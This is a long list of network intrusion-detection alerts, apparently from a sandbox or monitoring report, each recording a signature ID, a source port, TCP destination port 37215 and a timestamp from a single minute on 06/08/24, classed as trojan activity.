          SID:2829579
          Source Port:34624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353144
          SID:2829579
          Source Port:44892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.159043
          SID:2829579
          Source Port:47894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264350
          SID:2829579
          Source Port:41398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015415
          SID:2835222
          Source Port:39906
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.842226
          SID:2829579
          Source Port:42868
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264181
          SID:2829579
          Source Port:37284
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810851
          SID:2835222
          Source Port:52802
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.264677
          SID:2829579
          Source Port:34892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403167
          SID:2835222
          Source Port:36722
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.017065
          SID:2829579
          Source Port:43964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460882
          SID:2835222
          Source Port:33744
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731596
          SID:2829579
          Source Port:39436
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671220
          SID:2829579
          Source Port:46070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099398
          SID:2829579
          Source Port:55550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.895016
          SID:2829579
          Source Port:44820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.040213
          SID:2829579
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.233622
          SID:2835222
          Source Port:40046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817623
          SID:2835222
          Source Port:40152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.170733
          SID:2829579
          Source Port:54358
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.188230
          SID:2829579
          Source Port:41004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.113229
          SID:2829579
          Source Port:51166
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.456022
          SID:2835222
          Source Port:36804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.708429
          SID:2835222
          Source Port:44150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157614
          SID:2829579
          Source Port:38576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.516425
          SID:2829579
          Source Port:51180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461592
          SID:2835222
          Source Port:38276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.801199
          SID:2829579
          Source Port:42076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512672
          SID:2829579
          Source Port:55666
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741902
          SID:2829579
          Source Port:44534
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.099448
          SID:2835222
          Source Port:54646
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.297241
          SID:2829579
          Source Port:37764
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.066347
          SID:2829579
          Source Port:56630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.057899
          SID:2835222
          Source Port:50354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.299593
          SID:2835222
          Source Port:44630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.467440
          SID:2835222
          Source Port:38152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.739483
          SID:2835222
          Source Port:56156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108929
          SID:2829579
          Source Port:49422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.817651
          SID:2835222
          Source Port:58038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266209
          SID:2835222
          Source Port:44452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.461886
          SID:2835222
          Source Port:50112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462376
          SID:2829579
          Source Port:43088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731176
          SID:2835222
          Source Port:52714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.511543
          SID:2835222
          Source Port:43182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260776
          SID:2829579
          Source Port:42614
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.446861
          SID:2829579
          Source Port:43122
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.271636
          SID:2829579
          Source Port:54432
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787968
          SID:2829579
          Source Port:40780
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.912080
          SID:2835222
          Source Port:45696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.599870
          SID:2835222
          Source Port:58556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.108676
          SID:2835222
          Source Port:44900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.782940
          SID:2835222
          Source Port:52090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.015052
          SID:2829579
          Source Port:57508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816446
          SID:2829579
          Source Port:51004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.737856
          SID:2835222
          Source Port:42584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.261144
          SID:2835222
          Source Port:57136
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129304
          SID:2829579
          Source Port:33398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407418
          SID:2835222
          Source Port:35004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.861962
          SID:2829579
          Source Port:43784
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.602949
          SID:2829579
          Source Port:39160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.511651
          SID:2835222
          Source Port:51330
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791727
          SID:2829579
          Source Port:47476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075058
          SID:2829579
          Source Port:33052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.109408
          SID:2829579
          Source Port:33176
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:07.787383
          SID:2835222
          Source Port:59350
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449945
          SID:2835222
          Source Port:60276
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.020535
          SID:2829579
          Source Port:34126
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.847203
          SID:2829579
          Source Port:35010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730832
          SID:2829579
          Source Port:33588
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.745501
          SID:2835222
          Source Port:38812
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.729581
          SID:2835222
          Source Port:36596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.114045
          SID:2829579
          Source Port:41886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.515608
          SID:2835222
          Source Port:42948
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.112654
          SID:2835222
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.509676
          SID:2829579
          Source Port:46298
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.272712
          SID:2829579
          Source Port:60870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:21.019287
          SID:2835222
          Source Port:38682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.599445
          SID:2829579
          Source Port:53886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.552420
          SID:2829579
          Source Port:55984
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791550
          SID:2829579
          Source Port:40296
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.150691
          SID:2829579
          Source Port:46632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240994
          SID:2835222
          Source Port:40060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.403181
          SID:2829579
          Source Port:48424
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353720
          SID:2835222
          Source Port:49960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.075086
          SID:2835222
          Source Port:39230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897518
          SID:2829579
          Source Port:48578
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460873
          SID:2829579
          Source Port:55182
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.670572
          SID:2829579
          Source Port:58312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:43.262216
          SID:2829579
          Source Port:52320
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.704773
          SID:2829579
          Source Port:60822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.853018
          SID:2829579
          Source Port:43726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.857904
          SID:2835222
          Source Port:33070
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.893934
          SID:2835222
          Source Port:47526
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.789526
          SID:2829579
          Source Port:55088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.126498
          SID:2829579
          Source Port:35398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854206
          SID:2829579
          Source Port:53266
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405420
          SID:2829579
          Source Port:44672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353999
          SID:2835222
          Source Port:43840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.463487
          SID:2829579
          Source Port:40326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.083081
          SID:2829579
          Source Port:52422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731112
          SID:2835222
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161073
          SID:2835222
          Source Port:58898
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.810531
          SID:2829579
          Source Port:39456
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.902335
          SID:2829579
          Source Port:34038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.172914
          SID:2835222
          Source Port:50178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.734918
          SID:2835222
          Source Port:39556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.044881
          SID:2835222
          Source Port:59210
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470576
          SID:2829579
          Source Port:49466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.127993
          SID:2829579
          Source Port:50254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160367
          SID:2835222
          Source Port:42462
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.741447
          SID:2835222
          Source Port:39370
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.470357
          SID:2835222
          Source Port:38886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.460762
          SID:2829579
          Source Port:43972
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.442101
          SID:2835222
          Source Port:47142
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.547980
          SID:2835222
          Source Port:33188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.730190
          SID:2829579
          Source Port:55914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.153595
          SID:2835222
          Source Port:45226
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160979
          SID:2829579
          Source Port:55354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.260911
          SID:2829579
          Source Port:48818
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.237977
          SID:2829579
          Source Port:54040
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.241581
          SID:2829579
          Source Port:35960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600816
          SID:2835222
          Source Port:45912
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.706200
          SID:2829579
          Source Port:42568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:38.800413
          SID:2835222
          Source Port:58518
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.602226
          SID:2829579
          Source Port:38112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238629
          SID:2829579
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.747496
          SID:2829579
          Source Port:59264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.239995
          SID:2829579
          Source Port:44034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.854587
          SID:2835222
          Source Port:49318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.157211
          SID:2835222
          Source Port:59048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.450066
          SID:2835222
          Source Port:52970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.129514
          SID:2835222
          Source Port:47760
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.817632
          SID:2829579
          Source Port:44294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705496
          SID:2829579
          Source Port:59478
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667083
          SID:2835222
          Source Port:50804
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.240737
          SID:2835222
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.551932
          SID:2835222
          Source Port:54180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.707930
          SID:2835222
          Source Port:60896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.449621
          SID:2835222
          Source Port:48816
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884493
          SID:2835222
          Source Port:50896
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.155548
          SID:2829579
          Source Port:59750
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.161137
          SID:2829579
          Source Port:56088
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.671519
          SID:2835222
          Source Port:51072
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.115360
          SID:2835222
          Source Port:44242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:12.731145
          SID:2829579
          Source Port:38408
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:09.746339
          SID:2829579
          Source Port:60132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.108334
          SID:2835222
          Source Port:50006
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.262075
          SID:2829579
          Source Port:52084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.266540
          SID:2835222
          Source Port:44092
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.157773
          SID:2835222
          Source Port:42124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.160609
          SID:2829579
          Source Port:48940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.469156
          SID:2835222
          Source Port:38416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.812629
          SID:2829579
          Source Port:60466
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.884542
          SID:2829579
          Source Port:50022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.236633
          SID:2829579
          Source Port:36274
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892670
          SID:2829579
          Source Port:34754
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.859624
          SID:2835222
          Source Port:43196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.405163
          SID:2835222
          Source Port:58190
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.151198
          SID:2829579
          Source Port:52870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:37.705620
          SID:2835222
          Source Port:39564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:16.667482
          SID:2829579
          Source Port:43004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.154169
          SID:2835222
          Source Port:60062
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.055458
          SID:2835222
          Source Port:37998
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.518360
          SID:2835222
          Source Port:56546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.353451
          SID:2829579
          Source Port:34388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.353114
          SID:2835222
          Source Port:50826
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133184
          SID:2835222
          Source Port:40134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.130734
          SID:2829579
          Source Port:43596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.350785
          SID:2829579
          Source Port:58148
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:46.460895
          SID:2829579
          Source Port:48372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:25.791776
          SID:2835222
          Source Port:55714
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:18.816662
          SID:2829579
          Source Port:34172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:26.892215
          SID:2829579
          Source Port:57848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.600869
          SID:2829579
          Source Port:50728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:08.160816
          SID:2829579
          Source Port:49672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238082
          SID:2835222
          Source Port:54112
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:13.107681
          SID:2829579
          Source Port:32814
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.465019
          SID:2829579
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.600956
          SID:2829579
          Source Port:51642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:29.038069
          SID:2829579
          Source Port:53124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.133936
          SID:2829579
          Source Port:52288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:15.462651
          SID:2835222
          Source Port:34060
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.406911
          SID:2835222
          Source Port:43756
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.517783
          SID:2829579
          Source Port:33522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.178364
          SID:2829579
          Source Port:56194
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.855410
          SID:2835222
          Source Port:44454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:30.164232
          SID:2829579
          Source Port:58822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:34.601865
          SID:2829579
          Source Port:51010
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:31.238862
          SID:2835222
          Source Port:44844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:47.545625
          SID:2829579
          Source Port:47482
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:24.351832
          SID:2829579
          Source Port:50596
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:42.160637
          SID:2829579
          Source Port:59300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:32.407062
          SID:2829579
          Source Port:59316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:33.512854
          SID:2829579
          Source Port:46020
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:22.106160
          SID:2835222
          Source Port:40124
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:06.180203
          SID:2829579
          Source Port:40394
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:50.741034
          SID:2835222
          Source Port:55180
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/08/24-15:05:39.897946
          SID:2835222
          Source Port:42954
          Destination Port:37215
